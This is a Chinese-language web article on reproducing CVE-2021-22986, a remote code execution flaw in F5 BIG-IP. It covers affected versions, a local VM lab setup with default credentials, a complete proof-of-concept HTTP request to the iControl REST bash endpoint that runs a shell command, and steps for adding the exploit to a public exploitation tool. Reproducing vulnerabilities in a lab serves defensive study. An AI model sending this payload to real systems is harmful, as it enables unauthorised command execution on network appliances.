溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊(cè)×
其他方式登錄
點(diǎn)擊 登錄注冊(cè) 即表示同意《億速云用戶(hù)服務(wù)條款》

如何復(fù)現(xiàn)F5 BIG-IP遠(yuǎn)程代碼執(zhí)行漏洞CVE-2021-22986

發(fā)布時(shí)間:2021-12-29 17:54:05 來(lái)源:億速云 閱讀:222 作者:柒染 欄目:安全技術(shù)

本篇文章為大家展示了如何復(fù)現(xiàn)F5 BIG-IP遠(yuǎn)程代碼執(zhí)行漏洞CVE-2021-22986,內(nèi)容簡(jiǎn)明扼要并且容易理解,絕對(duì)能使你眼前一亮,通過(guò)這篇文章的詳細(xì)介紹希望你能有所收獲。

0x01 漏洞描述

F5 BIG-IP 是美國(guó) F5 公司的一款集成了網(wǎng)絡(luò)流量管理、應(yīng)用程序安全管理、負(fù)載均衡等功能的應(yīng)用交付平臺(tái)。

CVE-2021-22986 該漏洞允許未經(jīng)身份驗(yàn)證的攻擊者,通過(guò)BIG-IP管理界面和自身IP地址對(duì)iControl REST接口進(jìn)行網(wǎng)絡(luò)訪問(wèn),以執(zhí)行任意系統(tǒng)命令,創(chuàng)建或刪除文件以及禁用服務(wù)。

0x02 漏洞影響

F5 BIG-IP 16.0.0-16.0.1F5 BIG-IP 12.1.0-12.1.5.2
F5 BIG-IP 15.1.0-15.1.2F5 BIG-IQ 7.1.0-7.1.0.2
F5 BIG-IP 14.1.0-14.1.3.1F5 BIG-IQ 7.0.0-7.0.0.1
F5 BIG-IP 13.1.0-13.1.3.5F5 BIG-IQ 6.0.0-6.1.0

0x03 漏洞復(fù)現(xiàn)

https://login.f5.com/resource/registerEmail.do注冊(cè)好后,下載

https://downloads.f5.com/esd/eula.sv?sw=BIG-IP&pro=big-ip_v16.x&ver=16.0.1&container=16.0.1_Virtual-Edition&path=&file=&B1=I+Accept選擇ova格式的,可以快速使用vm虛擬機(jī)打開(kāi),安裝完后,用戶(hù)名:root,密碼:default,成功登陸后,輸入config輸入config ,幾次回車(chē)即可看到當(dāng)前ip,訪問(wèn)

如何復(fù)現(xiàn)F5 BIG-IP遠(yuǎn)程代碼執(zhí)行漏洞CVE-2021-22986

3.1 使用POC攻擊
POST /mgmt/tm/util/bash HTTP/1.1
Content-Type: application/json
User-Agent: Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Authorization: Basic YWRtaW46QVNhc1M=
X-F5-Auth-Token: 
Host: 192.168.1.191
Content-Length: 39

{"command":"run","utilCmdArgs":"-c id"}

如何復(fù)現(xiàn)F5 BIG-IP遠(yuǎn)程代碼執(zhí)行漏洞CVE-2021-22986

0x04 利用工具編寫(xiě)

直接使用上次的圖形化漏洞利用工具編寫(xiě)

圖形化漏洞利用工具已更新

項(xiàng)目地址:https://github.com/yhy0/ExpDemo-JavaFX

V1.1

參考冰蝎的代理,添加代理設(shè)置,方便走burp調(diào)試

優(yōu)化批量檢查邏輯,使用接口,這樣每次添加新的漏洞利用時(shí),就不需要修改批量檢查的邏輯。

src/main/java/com/yhy/core下新建CVE_2021_22986類(lèi),實(shí)現(xiàn)ExploitInterface接口,并實(shí)現(xiàn)里面的函數(shù),具體填充,直接將項(xiàng)目中的示例CVE_2020_14882的內(nèi)容復(fù)制過(guò)去,修改一下內(nèi)容,填充payload即可

如何復(fù)現(xiàn)F5 BIG-IP遠(yuǎn)程代碼執(zhí)行漏洞CVE-2021-22986

寫(xiě)完后,進(jìn)入src/main/java/com/yhy/core/Constants.javasrc/main/java/com/yhy/tools/Tools.java修改

如何復(fù)現(xiàn)F5 BIG-IP遠(yuǎn)程代碼執(zhí)行漏洞CVE-2021-22986

如何復(fù)現(xiàn)F5 BIG-IP遠(yuǎn)程代碼執(zhí)行漏洞CVE-2021-22986

運(yùn)行即可。

如何復(fù)現(xiàn)F5 BIG-IP遠(yuǎn)程代碼執(zhí)行漏洞CVE-2021-22986

上述內(nèi)容就是如何復(fù)現(xiàn)F5 BIG-IP遠(yuǎn)程代碼執(zhí)行漏洞CVE-2021-22986,你們學(xué)到知識(shí)或技能了嗎?如果還想學(xué)到更多技能或者豐富自己的知識(shí)儲(chǔ)備,歡迎關(guān)注億速云行業(yè)資訊頻道。

向AI問(wèn)一下細(xì)節(jié)

免責(zé)聲明:本站發(fā)布的內(nèi)容(圖片、視頻和文字)以原創(chuàng)、轉(zhuǎn)載和分享為主,文章觀點(diǎn)不代表本網(wǎng)站立場(chǎng),如果涉及侵權(quán)請(qǐng)聯(lián)系站長(zhǎng)郵箱:is@yisu.com進(jìn)行舉報(bào),并提供相關(guān)證據(jù),一經(jīng)查實(shí),將立刻刪除涉嫌侵權(quán)內(nèi)容。

AI